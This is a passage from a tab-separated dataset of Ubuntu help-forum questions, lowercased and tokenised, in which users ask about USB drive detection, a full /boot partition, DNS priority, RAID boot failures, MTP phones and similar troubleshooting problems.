82 linux swap / solaris /dev/sdb6 1884665856 1953523711 34428928 83 linux the drive is not listed there : sda and sdb are both internal drives . this is my /etc/fstab file use 'blkid ' to print the universally unique identifier for a device ; this may be used with uuid= as a more robust way to name devices that works even if disks are added and removed . see fstab ( 5 ) . < file system > < mount point > < type > < options > < dump > < pass > / was on /dev/sda3 during installation uuid=e49d6bf2-e5a9-42a2-931a-04c517419ec5 / ext4 errors=remount-ro 0 1 /home was on /dev/sda6 during installation uuid=e57f650d-84ba-47c6-8efd-f6648ef68450 /home ext4 defaults 0 2 # swap was on /dev/sda5 during installation uuid=d1a70cac-f03e-4a65-9db7-fa732dfd66c7 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /dev/disk/by-uuid/f40cd4050cd3c132 /mnt/f40cd4050cd3c132 auto nosuid , nodev , nofail , x-gvfs-show 0 0 this f40cd4050cd3c132 rule is for one of the internal drives . dmesg | tail gives me this [ 1710.062519 ] usb-storage 9-4:1.0 : usb mass storage device detected [ 1710.062737 ] scsi97 : usb-storage 9-4:1.0 [ 1711.060736 ] scsi 97:0:0:0 : direct-access toshiba external usb 3.0 0001 pq : 0 ansi : 6 [ 1711.061223 ] sd 97:0:0:0 : attached scsi generic sg6 type 0 [ 1713.059945 ] sd 97:0:0:0 : [ sdg ] 1953525168 512-byte logical blocks : ( 1.00 tb/931 gib ) [ 1713.060350 ] sd 97:0:0:0 : [ sdg ] write protect is off [ 1713.060358 ] sd 97:0:0:0 : [ sdg ] mode sense : 33 00 00 08 [ 1713.060780 ] sd 97:0:0:0 : [ sdg ] write cache : disabled , read cache : enabled , does n't support dpo or fua [ 1713.093726 ] sdg : sdg1 [ 1713.095163 ] sd 97:0:0:0 : [ sdg ] attached scsi disk testdisk locates the disk at /dev/sdg but when i try to analyze , i get this `` partition : read error '' message , and after analyzing , `` no partition found '' . and when i open the disk utility included in ubuntu , the disk is not on the list but a toshiba disk flashes for less than a second when i do fdisk -l ( and the every 20 seconds ) . gparted does n't do anything either . it will recognize /dev/sdg but wo n't do stat on it . i really do not know what to do next . thanks for your help ! update : i can connect the drive to one of the usb back ports and ubuntu will recognize it without problem . the thing is that it also works on windows when connected to the front ports , so there is still a problem . i can connect other drives to the front port in ubuntu without problem , and the toshibe used to work until a few weeks ago . update 2 : the output of cat /proc/partitions when the drive is connected to the back port : major minor # blocks name 8 0 976762584 sda 8 1 976759808 sda1 8 16 976762584 sdb 8 17 358400 sdb1 8 18 923972608 sdb2 8 19 16000000 sdb3 8 20 1 sdb4 8 21 1998848 sdb5 8 22 34428928 sdb6 8 32 976762584 sdc 8 33 976759808 sdc1 the output is the same when connected to the front port , but it still will not be either mounted nor recognized .
511771	how to access photo 3g dongle in ubuntu 14.04 ?	i had tried to access photon 3g dongle with different method.i had also tried method of sakis3g script for installing the dongle but still it does not work for me.please help me top access my tata photon 3g dongle in ubuntu 14.04..
511772	upgrading ubuntu version on version	i have already upgraded my ubuntu from 12.04 to 14.04 but my question is why should i do this . as an user of this wonderful os , what could be the consequences of not to upgrading the ubuntu version in the future .
511773	ubuntu 14.04 lts dns	since the introduction in ubuntu 12 of a new way to handle dns with the resolv.conf file https : //www.stgraber.org/2012/02/24/ ... -ubuntu-12-04/ i need to clarify something inside this article as for dealing with dns failures , dnsmasq often sends the dns queries to more than one dns servers ( if you received multiple when establishing your connection ) and will detect bogus/dead ones and simply ignore them until they start returning sensible information again . this is to compare against the libc’s way of doing dns resolving where the state of the dns servers can’t be saved ( as it’s just a library ) and so every single application has to go through the same , trying the first dns , waiting for it to timeout , using the next one . in our setup we have a dns server who work very well with all mac and pc inside our company but not with the new ubuntu 14 our router send by dhcp 3 dns addresses dns1 : internal dns ( running by mac os x server 10.9 server 3.12 ) dns2 : external dns from isp dns3 external dns from isp we had a service running on one internal server with a dns entry in our dns server all workstation work very well except the ubuntu station . the machine have a intermittent problem with the dns after some troubleshooting we have found ubuntu do n't respect priority in the way dns order are defined sometime it 's looking first the dns1 ( like it should be ) and some other time he look at dns2 or dns3 instead of dns1 ( our other stations never fail to get the dns correctly from the dns server ) the ip address from the outside are not the same than the ip from our internal network ( normal ) we did a setup like explained in the link above with the resolv.conf and put nameserver with our internal dns server ip and now its working all the time correctly because it resolve the right dns name and ip form our internal dns server my question ? is it a bug in the dns of ubuntu ? or this behaviour its normal ( if yes could you explain me ) the way we insert a dns entry in the resolv.conf is it the right way to force to check a certain dns first ? do you have any suggestion for my situation ? thanks in advance
511774	gcc compiled c-code on an sd-card not executing	so i wrote a program and compiled it with gcc program.c -o program when i try to run it with ./program i get the following bash : ./program : permission denied with 'sudo ./program ' it tells me 'command not found ' . worth mentioning is that i 'm working on an sd-card . i created a symbolic link in my home/user directory to it 's mount location in /media/user so i could easily access my files . when i compile and run the same code in my home/user directory it works just like intended so the problem lies here , probably . anyone knows how to solve this ?
511775	boot is full ( no prior solutions helped )	i have already seen that this page as well as the ubuntu forum itself has quite some similar questions , but none of the solutions has helped me yet , so i 'll try it here as well : the general problem is that my boot is full and it all started because i wanted to update my skype ( 4.2. it does n't want to connect ) as well as install the newest updates of the os . here 's how the space situation looks like : daniel @ daniel-svs1512z9eb : ~ $ df -h filesystem size used avail use % mounted on /dev/mapper/ubuntu -- vg-root 909g 803g 61g 93 % / none 4,0k 0 4,0k 0 % /sys/fs/cgroup udev 3,9g 4,0k 3,9g 1 % /dev tmpfs 787m 1,2m 786m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 3,9g 1,2m 3,9g 1 % /run/shm none 100m 36k 100m 1 % /run/user /dev/sda1 228m 226m 0 100 % /boot as i have read that 228mb should normally be enough for a /boot space as well as to increase the /boot space is a bit tricky . the next thing i read was to see which kernels i have , which looks like this : daniel @ daniel-svs1512z9eb : ~ $ ls /boot/ abi-3.11.0-13-generic config-3.8.0-19-generic initrd.img-3.8.0-32-generic system.map-3.8.0-32-generic abi-3.11.0-14-generic config-3.8.0-31-generic lost+found vmlinuz-3.11.0-13-generic abi-3.11.0-15-generic config-3.8.0-32-generic memtest86+.bin vmlinuz-3.11.0-14-generic abi-3.8.0-19-generic grub memtest86+_multiboot.bin vmlinuz-3.11.0-15-generic abi-3.8.0-31-generic initrd.img-3.11.0-13-generic system.map-3.11.0-13-generic vmlinuz-3.8.0-19-generic abi-3.8.0-32-generic initrd.img-3.11.0-14-generic system.map-3.11.0-14-generic vmlinuz-3.8.0-31-generic config-3.11.0-13-generic initrd.img-3.11.0-15-generic system.map-3.11.0-15-generic vmlinuz-3.8.0-32-generic config-3.11.0-14-generic initrd.img-3.8.0-19-generic system.map-3.8.0-19-generic config-3.11.0-15-generic initrd.img-3.8.0-31-generic system.map-3.8.0-31-generic as well as : total 224112 drwxr-xr-x 4 root root 2048 aug 12 17:41 . drwxr-xr-x 23 root root 4096 aug 12 17:41 .. -rw-r -- r -- 1 root root 1006439 okt 23 2013 abi-3.11.0-13-generic -rw-r -- r -- 1 root root 1006439 nov 12 2013 abi-3.11.0-14-generic -rw-r -- r -- 1 root root 1006496 dez 9 2013 abi-3.11.0-15-generic -rw-r -- r -- 1 root root 918917 mai 1 2013 abi-3.8.0-19-generic -rw-r -- r -- 1 root root 919745 sep 10 2013 abi-3.8.0-31-generic -rw-r -- r -- 1 root root 919745 okt 2 2013 abi-3.8.0-32-generic -rw-r -- r -- 1 root root 163255 okt 23 2013 config-3.11.0-13-generic -rw-r -- r -- 1 root root 163255 nov 12 2013 config-3.11.0-14-generic -rw-r -- r -- 1 root root 163245 dez 9 2013 config-3.11.0-15-generic -rw-r -- r -- 1 root root 154942 mai 1 2013 config-3.8.0-19-generic -rw-r -- r -- 1 root root 154960 sep 10 2013 config-3.8.0-31-generic -rw-r -- r -- 1 root root 154961 okt 2 2013 config-3.8.0-32-generic drwxr-xr-x 5 root root 1024 jan 18 2014 grub -rw-r -- r -- 1 root root 26820066 nov 27 2013 initrd.img-3.11.0-13-generic -rw-r -- r -- 1 root root 26825891 dez 22 2013 initrd.img-3.11.0-14-generic -rw-r -- r -- 1 root root 27013824 jan 18 2014 initrd.img-3.11.0-15-generic -rw-r -- r -- 1 root root 32026464 sep 28 2013 initrd.img-3.8.0-19-generic -rw-r -- r -- 1 root root 32097611 sep 28 2013 initrd.img-3.8.0-31-generic -rw-r -- r -- 1 root root 24683897 okt 25 2013 initrd.img-3.8.0-32-generic drwxr-xr-x 2 root root 12288 sep 28 2013 lost+found -rw-r -- r -- 1 root root 176500 jun 17 2013 memtest86+.bin -rw-r -- r -- 1 root root 178680 jun 17 2013 memtest86+_multiboot.bin -rw -- -- -- - 1 root root 3286187 okt 23 2013 system.map-3.11.0-13-generic -rw -- -- -- - 1 root root 3286278 nov 12 2013 system.map-3.11.0-14-generic -rw -- -- -- - 1 root root 3293845 dez 9 2013 system.map-3.11.0-15-generic -rw -- -- -- - 1 root root 3060094 mai 1 2013 system.map-3.8.0-19-generic -rw -- -- -- - 1 root root 3062541 sep 10 2013 system.map-3.8.0-31-generic -rw -- -- -- - 1 root root 3062477 okt 2 2013 system.map-3.8.0-32-generic -rw -- -- -- - 1 root root 5600496 okt 23 2013 vmlinuz-3.11.0-13-generic -rw -- -- -- - 1 root root 5601072 nov 12 2013 vmlinuz-3.11.0-14-generic -rw -- -- -- - 1 root root 5631184 dez 9 2013 vmlinuz-3.11.0-15-generic -rw -- -- -- - 1 root root 5356528 mai 1 2013 vmlinuz-3.8.0-19-generic -rw -- -- -- - 1 root root 5362320 sep 10 2013 vmlinuz-3.8.0-31-generic -rw -- -- -- - 1 root root 5363184 okt 2 2013 vmlinuz-3.8.0-32-generic in other threads they then go on to propose to remove some of the old kernels , which for example i 'm trying to do as a test with one of the older kernels : daniel @ daniel-svs1512z9eb : ~ $ sudo apt-get purge linux-image-3.8.0-19 reading package lists ... done building dependency tree reading state information ... done note , selecting 'linux-image-3.8.0-19-generic ' for regex 'linux-image-3.8.0-19' you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-image-extra-3.11.0-19-generic : depends : linux-image-3.11.0-19-generic but it is not going to be installed linux-image-extra-3.11.0-26-generic : depends : linux-image-3.11.0-26-generic but it is not going to be installed linux-image-extra-3.8.0-19-generic : depends : linux-image-3.8.0-19-generic but it is not going to be installed linux-image-generic : depends : linux-image-3.11.0-26-generic but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . if i 'm trying to run apt-get-f install this is what i 'm getting : daniel @ daniel-svs1512z9eb : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : openjdk-7-jre-lib use 'apt-get autoremove ' to remove it . the following extra packages will be installed : linux-image-3.11.0-19-generic linux-image-3.11.0-26-generic suggested packages : fdutils linux-doc-3.11.0 linux-source-3.11.0 linux-tools the following new packages will be installed : linux-image-3.11.0-19-generic linux-image-3.11.0-26-generic 0 upgraded , 2 newly installed , 0 to remove and 272 not upgraded . 5 not fully installed or removed . need to get 0 b/28,9 mb of archives . after this operation , 79,8 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 428373 files and directories currently installed . ) unpacking linux-image-3.11.0-26-generic ( from ... /linux-image-3.11.0-26-generic_3.11.0-26.45_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.11.0-26-generic_3.11.0-26.45_amd64.deb ( -- unpack ) : can not copy extracted data for './boot/system.map-3.11.0-26-generic ' to '/boot/system.map-3.11.0-26-generic.dpkg-new ' : failed to write ( no space left on device ) no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-26-generic /boot/vmlinuz-3.11.0-26-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-26-generic /boot/vmlinuz-3.11.0-26-generic unpacking linux-image-3.11.0-19-generic ( from ... /linux-image-3.11.0-19-generic_3.11.0-19.33_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.11.0-19-generic_3.11.0-19.33_amd64.deb ( -- unpack ) : can not copy extracted data for './boot/system.map-3.11.0-19-generic ' to '/boot/system.map-3.11.0-19-generic.dpkg-new ' : failed to write ( no space left on device ) no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-19-generic /boot/vmlinuz-3.11.0-19-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-19-generic /boot/vmlinuz-3.11.0-19-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.11.0-26-generic_3.11.0-26.45_amd64.deb /var/cache/apt/archives/linux-image-3.11.0-19-generic_3.11.0-19.33_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) so here it also says there 's no space left . are there any solutions you propose as to how i can actually free up some space on /boot in this situation ? i 'm sorry for being so long , but i just thought it is better to give a bit more info and get it done than less . thanks a lot in advance !
511777	partitions dual boot	i have booted from a usb containing ubuntu 64 bit 14.04 when i try to install it it says i have 1mb free space .in windows 8.1 i have gone to disk management and checked how many partitions i have .i have 6 . 7 if i include the 20gb unallocated i made especially for ubuntu 14.04 . i know i should only have 4 partitions , so how do i delete some of them and which ones do i delete ? it 's a brand new computer running windows 8 which i have just upgraded to 8.1 , help cheers
511778	how do i get my apple wireless mouse to stay paired after a reboot or shutdown ?	i use 14.04 on a mac mini and an apple wireless mouse . i installed blueman to get it to work , the only problem is that when i reboot or shutdown , it does n't automatically work again . i 'm forced to plug in a usb mouse and click on the bluetooth icon to have it `` connect '' before i can use the wireless mouse . the wireless keyboard on the other hand pairs just fine without intervention . does anyone know what i should do ? i wan na be able to stop using the usb mouse altogether .
511779	ubuntu 12.04 to 14.04 distribution upgrade pauses `` configuring lightdm '' ... `` default display manager : '' gdm , lightdm	apologies if i overlooked this in the docs somewhere . let me document something just incase it was missed . my upgrade from 12.04 to 14.04 pauses on a package configuration . the first time i did this i found it to be stuck on a screen saying < ok > to continue . it seemed unresponsive as i was unable to choose `` ok '' with the tab or by way of the mouse and unable to proceed . i hacked around that the first time by guessing and killing that process . this time , i came to my senses and finally figure out that i could hit tab 3 or 4 times to select `` < ok > '' then press enter ( i did not screen shot that screen ) . so , this should be documented somehow , i would be concerned for anyone upgrading . so , if you unable to select `` < ok > '' .. tab repeatedly until it gets selected then press enter . now i 'm faced with a choice below but i do n't know what the implications are . i have gdm installed but i will go with unity . i do n't see a link between unity and lightdm . what are the implications of choosing either ?
511780	google chrome tabs crash	chrome version 36.0.1985.143 ubuntu 14.04 after upgrading to 14.04 google chromes tabs crash . i 'm not sure of the conditions on how to make them crash . but after idk a few hours or a day of using chrome or after i restart chrome i 'll go to open a new tab and it just crashes . even when it 's just an empty tab . it seems to do it maybe based on the amount of resources the page uses ? for example if i try to open the google play store site , the tab crashes ( right now ) . if i go to just google.com the page works . i could open another site and it loads , but when i try to scroll down it crashes . i have about 41 tabs open in 4 different windows . i 've tried turning off all plug-ins and apps as the crash page suggests but with no luck . i 'm on a dell latitude e6530 8gb of ram . only 40 % of my ram is being used . i uninstalled , deleted any files/folders left behind , then reinstalled chrome as @ klyn suggested . so far i have not had a crash . edit 08/09/2014 : nope i was wrong . it 's still doing it . i have no idea what is happening . the page might partial load them bam , it crashes . i try to open an new tab , it crashes . and this is a new tab with nothing on it , chrome 's default tab page . the crash is the `` aw , snap ! '' crash . the page will sometimes load , then i scroll down and it crashes . if i had to guess , it would have to do with the amount of tabs i have open . i 'll try @ matthew greenlaw 's solution and report back . looks like @ matthew greenlaw 's issue is the same one i 'm having . here 's what came up in the error logs [ 28578:28610:0913/140212 : warning : shared_memory_posix.cc ( 386 ) ] shared memory creation failed ; out of file descriptors [ 28578:28610:0913/140212 : error : host_shared_bitmap_manager.cc ( 144 ) ] can not create shared memory buffer [ 28578:28613:0913/140212 : warning : crash_handler_host_linux.cc ( 289 ) ] could not translate tid - assuming crashing thread is thread group leader ; syscall_supported=0 [ 28578:28630:0913/140212 : error : crash_handler_host_linux.cc ( 371 ) ] failed to write crash dump for pid 28739 can not upload crash dump : failed to open failed to create temporary file in /tmp : can not upload crash dump i 've upped my file limit to 4096 . i 'll report back in a couple weeks if the crash has n't happened again , and mark @ matthew greenlaw 's answer as the answer .
511782	upgrading eclipse from kepler to luna fails in ubuntu 14.04	trying to use eclipse 's auto-update to go from the kepler release to the new luna ( using ubuntu 14.04 ) . got everything set , started eclipse in admin mode , and selected help -- > check for updates . it appeared to be working , until it failed with this message : an error occurred while uninstalling session context was : ( profile=epp.package.standard , phase=org.eclipse.equinox.internal.p2.engine.phases.uninstall , operand= [ r ] org.eclipse.platform_root 4.3.2.v20140221-1852 -- > null , action=org.eclipse.equinox.internal.p2.touchpoint.natives.actions.cleanupzipaction ) . backup of file /opt/eclipse/.eclipseproduct failed . file that was copied to backup could not be deleted : /opt/eclipse/.eclipseproduct kind of seems like some sort of permissions problem , but i have no idea how to fix it .
511785	ca n't figure out join command	i have two files and i 'm trying to join them at a certain spot . i 'd like to join them at the fourth column of the second file using the first column of the first . it 's driving me nuts ! here is what i 'm trying : join -j4 < ( sort -k1 firstfile.txt ) < ( sort -k4 secondfile.txt ) firstfile.txt : 24.136.152.171 us 24.136.152.171 us 24.136.152.171 us secondfile.txt 2014-08-03 00:00:00 user 24.136.152.171 2014-08-03 00:00:00 user 24.136.152.171 2014-08-03 00:00:00 user 24.136.152.171 desired output : 2014-08-03 00:00:00 user 24.136.152.171 us 2014-08-03 00:00:00 user 24.136.152.171 us 2014-08-03 00:00:00 user 24.136.152.171 us
511786	recovery of formatted hard drive !	i had accidentally erase everything option while switching to ubuntu . can you please help me to tell me how recover that drive please as there are many important documents and photos . please if i can get your help..
511787	why switching panel underlay application ?	i 'm new to ubuntu ; i just start playing round with it a week ago . sometimes when i press alt+tab to switching between applications , the panel shows underlay applications i 'm working on . even when i press super key to search for application , still the panel was behind my current applications . after i restart my computer , this problem will disappear . i just do n't want to restart my computer when i have urgent ask to do . i 'm on 14.04 ; please advice ! ! thanks , luffy
511788	chmod+x is not working at ubuntu on aws ec2	i am trying to run a hadoop word count code in python at the amazon ec2 environment . i am using ubuntu 14.04 . i run the following command chmod a+x test.sh and expect to run it test.sh as a command . here is the error message i got : `` test.sh : command not found '' . when i use ls -l *.sh , i did see that it has the `` x '' permission at all level . my test.sh is simply , listed as below : # ! /bin/bash wc -l *.py when i list the path , it looks ok with me as well . here it is : /home/hduser/hadoop-2.4.0/bin : /home/hduser/hadoop-2.4.0/sbin : /usr/lib/jvm/java-7-openjdk-amd64//bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /usr/lib/pig/pig-0.11.1/bin can anybody in this forum help ? ? thanks in advance ! max
511789	do higher level scripting languages use shell scripts to work ?	i 'm just learning about bash and when i saw that bash uses 'echo ' i tried to search for the relationship between php and bash and it seems like people are building programs were bash script and php scripts are mixed together . do scripting languages like javascript and php use shell scripts to work ? do php and javascript interpreters in any way dependent on shell scripts ? is this any different when it comes to compiled code ? ( i know that the separation of scripting languages and compiled languages are not that clear cut since you can compile javascript and interpret some of the languages which are normally compiled . so in this part of the question i 'm asking whether there is any difference when it comes to compiled code , regardless of language . )
511790	can not find -lboost_thread-mt	i 'm getting 2 errors : /usr/bin/ld : can not find -lboost_thread-mt /usr/bin/ld : can not find -lboost_program_options-mt what is the simplest way for me to install -lboost_thread-mt so that i can finish my install of psmoveinput please note that i need the -lboost_thread-mt and ive tried installing `` all boost '' which did n't work ive installed all the others and even read somewhere that the -lboost_thread-mt isnt available and if thats the case is there a archive i can get it from ? thank you and sorry for my lack of technical terms .
511792	how can i bulk-add a file 's creation date to the filename ?	i have generated a time-lapse series of images and have named them sequentially { 0000..9999 } .jpg this is n't great for browsing the whole set as it 's harder to tell when a given image was taken from its filename . i would like to rename them so their names contain their creation date , eg : 0000.jpg → 20140815-142800-0000.jpg 0001.jpg → 20140815-142800-0001.jpg 0002.jpg → 20140815-142800-0002.jpg it 's important to preserve the original filename elements and the exact date formatting is n't that important , as long as it 's filename-safe and easy to understand . my example above inserts it at the front in a way that is conducive to sorting by date . if you want test harness of files , the following will create 10 files with ascending creation times : for i in { 00..02 } ; do touch -- date `` 2014-08-15 $ i : $ i : $ i '' 00 $ i.jpg ; done
511797	share usb barecode scanner with remmina remote desktop connection	i am responsible for the project to transform remaining windows xp computers into thin client to connect to a terminal server . so far so good . i installed ubuntu 14.04 and i use remmina to connect with rdp to our server and everything connects smoothly . now i need to connect an usb barcode scanner to computer and share in on the remote session but it does n't work . i 'm able to share an usb key on the remote session without problem . is there a way to share a usb port through rdp connection to see so the remote session can see the barcode scanner connected to the ubuntu desktop ? some info about what i 'm using : - ubuntu 14.04 descktop - windows server 2012 ( vm ) - usb barcode scanner ( symbol ) i hope my first post is not too complicated or too long and that you can help me . tell me if you need more informations . thanks foxgeek
511799	mobile broadband connection is unavailable / usb modem detected as cd	i have almost the same problem as described here : can not make mobile broadband connection in ubuntu 13.04 i 've added new broadband connection , but it 's still not visible on the list . from what i understand my modem is detected as cd i understand the problem , but i do n't know the solution : i 've readed : https : //wiki.archlinux.org/index.php/huawei_e1550_3g_modem but i use huawei e353 and i 'm not sure if i should do same thing for this modem ? in the linked question there is information 'you can to use special at-commands . ' i do n't know how to do this . can you please give me a hint ? resulf of lsusb bus 002 device 005 : id 12d1:14fe huawei technologies co. , ltd . result of sudo lsblk name maj : min rm size ro type mountpoint sda 8:0 0 119,2g 0 disk ├─sda1 8:1 0 111,4g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 7,9g 0 part [ swap ] sr0 11:0 1 1024m 0 rom i do n't have any cd in the computer right now .
511800	unblock 3g modem dialog	when i plug in my usb 3g modem it takes ages until de unblock device screen comes up , sometimes i need to plug and unplug several times and the hole process may take 10 minutes . is there a way to force the unblock dialog to screen ? or at least a way to show 3g connection in network tray icon even if modem is not yet unblocked ? thank you
511801	unable to log in - wo n't accept password	ubuntu has started rejecting my password when i log in . not a new installation ; i have been able to log in until now . any suggestions for recovery with current installation ? is it possible to install newer version of ubuntu without losing projects and data ? i started to try this , but it looked as though i would lose all data . please note that i am not a power user . although i did not see any questions that precisely matched mine , the replies i saw were way over my head . any help will be appreciated . thanks , jim
511806	mtp with android phone unreliable on 14.04	with 12.04 , i was able to connect my android phone without problem ( using mtp ) to my ubuntu machine . open nautilus , there is my phone , and i can click through to the folders that i wanted . however , ever since 14.04 , it has been extremely unreliable . open nautilus , and sometimes ( about a third of the time ) my phone is there . when it is n't there , the only solution is to reboot ubuntu . when it 's there , clicking though to the phone 's folders sometimes works , and sometimes results in an error . even when it works , the phone will often disappear without warning halfway through browsing the folders . i have installed mtpfs ; i have also followed the how-to in the forum . i also tried replacing my usb cord in case it was faulty . no luck . what can i do to diagnose and ultimately fix this , please ? edit : the idvendor is 18d1 and the idproduct is 4ee1 . the default entry in /lib/udev/rules.d/69-libmtp.rules reads : attr { idvendor } == '' 18d1 '' , attr { idproduct } == '' 4ee1 '' , symlink+= '' libmtp- % k '' , mode= '' 660 '' , group= '' audio '' , env { id_mtp_device } = '' 1 '' , env { id_media_player } = '' 1 '' the entry in /etc/udev/rules.d/51-android.rules reads : attr { idvendor } == '' 18d1 '' , attr { idproduct } == '' 4ee1 '' , mode=â0666 '' the entry in /lib/udev/rules.d/69-mtp.rules reads : attr { idvendor } == '' 18d1 '' , attr { idproduct } == '' 4ee1 '' , symlink+= '' libmtp- % k '' , env { id_mtp_device } = '' 1 '' , env { id_media_player } = '' 1 ''
511807	resume from suspend does n't work on macbookpro 4.1with ubuntu 14.04 13.10	finally i have something to ask and a problem which i can not solve just googling . as i said in the title , resume from suspend does n't work on my macbookpro 4.1 with ubuntu 14.04 installed . not even with clean live cd . after resuming from suspend and logging , destop appears without unity or other menus and totally freezes not even mouse pointer can be moved . if powerbutton is pressed shortly in the stuck situation result is 1/10s showed commandline error message ( may i should take videoclip of that ? ) and finally blank screen which requires long press of powerbutton . ctrl-alt-fx -terminals does n't work on the situation . suspend worked greatly with 12.10 , so what has been broken this feature and what i can do ? that macbookpro is my thirtiary computer , so the the problem is not big for me . i guess that problem is that some of the kernel modules can not wakeup or x-windowing is confused but those are only guesses . i know that mac-users are a marginal group of ubuntu users , but i would be glad as ubuntu enthusiast if somebody knows the workaround . br . mikko
511808	xubuntu 14.04 automount ext4 usb stick as root	i recently formatted my new sandisk usb stick with linux from the default fat32 to ext4 . unfortunatelly , when thunar automounts the stick , it is mounted as root and not as the current user , so if i want to write to it , i need to open a root shell ( or sudo ) . when i reformat the stick to ntfs , everything works fine ... does anybody know , why this happens and how i can change that behaviour ? ( i also tried it with nautilius - > same outcome ) user @ xubuntu : ~ $ ls -al /media/user/ total 12 drwxr-x -- -+ 3 root root 4096 aug 13 17:03 . drwxr-xr-x 3 root root 4096 aug 6 10:11 .. drwxr-xr-x 3 root root 4096 aug 13 16:25 usbtest please let me know , if you need any further information than provided ... update this is the output of lsusb , that a friend suggestend : bus 001 device 002 : id 0781:5575 sandisk corp. device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x0781 sandisk corp. idproduct 0x5575 bcddevice 1.27 imanufacturer 1 ( error ) iproduct 2 ( error ) iserial 3 ( error ) bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 32 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 200ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 8 mass storage binterfacesubclass 6 scsi binterfaceprotocol 80 bulk-only iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 1 device status : 0x0000 ( bus powered )
511810	ubuntu desktop 14 on poweredge does n't boot on raid	i have a dell 1u poweredge 1950 , and for some reason , we can not install ubuntu 14.04 64bit desktop edition on it . i know what you 're thinking ... why are you installing desktop ? i have asked the same question myself over and over again ! the individual that will be using this server wants to use the gui version of virtual box and as a result wants nothing but the desktop version of ubuntu installed . that issue aside , here is the weird part . i create a raid 1 array between the two drives like normal and do the install like normal . everything works great and the system installs successfully . then upon reboot it drops me to the busybox v1.21.1 shell . i get dropped to a ( initramfs ) prompt . if i pull one of the raid 1 drives and boot again , it will boot just fine . if i replace the drive and pull the other drive , it also boots just fine . this tells me it is something to do with raid . ie , when the raid array is degraded , it is just booting off a single drive as if no raid was present . when the raid is active though , it seems it cant boot . also , before you ask , we have confirmed this is not a hardware issue . i thought we had a raid hardware issue and so i shipped the original server back and had it replaced with a completely different but identical server . i just tried to do the install again this morning on the new server and ran into the exact same issue . seems like this is a driver issue , but i have never experienced this before with ubuntu . any thoughts ? thanks ! here is the shell i get dropped to with output : gave up waiting for root device . common problems : - boot args ( cat /proc/cdmline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/mapper/ubuntu -- vg-root does not exist . dropping to a shell ! busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in ( ash ) enter 'help ' for a list of builtin commands . ( initramfs )
511814	can ubuntu ( 14.04 ) run full screen ( 2160x1440 ) in hyper-v gen 2 on surface pro 3 ?	i was able to change the resolution to 1920x1080 by changing parameters in /etc/default/grub . but if i set the resolution to 2160x1440 ( the resolution of surface pro 3 ) , it does not accept this setting . i am reading everywhere that 1920x1080 is max resolution , but i do n't understand why . there must be a way how to increase max resolution . can anyone help ?
511815	what are trash and .trash-1000 ?	when deleting a file a .trash-1000 folder is created which contains two subfolders files and info . my deleted file as well as folder is saved all inside the subfolder files . if i select trash and right click + properties i can not see the location of trash , just the details of files it contains . if all my deleted files are saved in a hidden folder in same directory , what is trash ? is it just a virtual folder which seems to exist but really does n't ?
511816	`` safely remove '' does n't seem to spin down the external hard drive	i have a usb hdd attached to the computer , and i 've noticed that , when using `` safely remove '' from the launcher , the drive continues producing noise and its led is on continually . however , if i first unmount it with umount /dev/sdc1 , and then safely remove it - it works as it did before , the led starts blinking , and the drive spin downs .
511817	how do i record with recordmydesktop with encode on the fly on without making video too fast ?	ok , so when i record with recordmydesktop with encode on the fly off i can only record for 40 seconds , and if i have it on the video plays too fast . how can i have it on without it playing too fast ?
